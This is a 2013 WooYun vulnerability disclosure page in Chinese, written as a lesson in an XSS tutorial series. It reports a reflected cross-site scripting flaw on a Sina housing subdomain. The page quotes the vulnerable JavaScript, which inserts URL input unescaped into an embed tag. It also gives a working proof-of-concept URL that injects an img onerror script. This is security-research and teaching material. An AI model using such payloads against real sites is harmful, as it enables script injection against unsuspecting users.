WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-017519

漏洞标题：[新浪XSS一课一练]瘦子XSS教程第一课深入：典型XSS的检测

相关厂商：新浪

漏洞作者： 专注XSS三十年

提交时间：2013-01-19 10:40

修复时间：2013-03-05 10:41

公开时间：2013-03-05 10:41

漏洞类型：xss跨站脚本攻击

危害等级：低

自评Rank：1

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签： 无

4人收藏 收藏

分享漏洞：

漏洞详情

披露状态：

2013-01-19： 细节已通知厂商并且等待厂商处理中
2013-01-19： 厂商已经确认，细节仅向厂商公开
2013-01-29： 细节向核心白帽子及相关领域专家公开
2013-02-08： 细节向普通白帽子公开
2013-02-18： 细节向实习白帽子公开
2013-03-05： 细节向公众公开

简要描述：

第一课 http://www.wooyun.org/bugs/wooyun-2010-015957
新浪的XSS自然比腾讯更多，这里只讨论IE浏览器下的情况，其它浏览器可能需要做一些变形。
纯粹的完全无过滤确实不太好找，这个其实是输出在HTML属性里，严格来说应该算是第三课的扩展，不过算了，勉强算是没有任何过滤吧。第三课的时候我找个输出在<input value= 的例子。

详细说明：

var str=window.location.href;
			  var es=/url=/;
			  es.exec(str);
			  var right=RegExp.rightContext;
……
<embed id=sp pluginspage='http://www.macromedia.com/go/getflashplayer' src='http://you.video.sina.com.cn/api/sinawebApi/outplayrefer.php/vid="+right+"/s.swf' type=……

http://bt.house.sina.com.cn/zdy/page/lc600_sp.html?url=11">'><img src=1 onerror=alert(1);><textarea>

漏洞证明：

修复方案：

版权声明：转载请注明来源 专注XSS三十年@乌云

漏洞回应

漏洞评价：

评论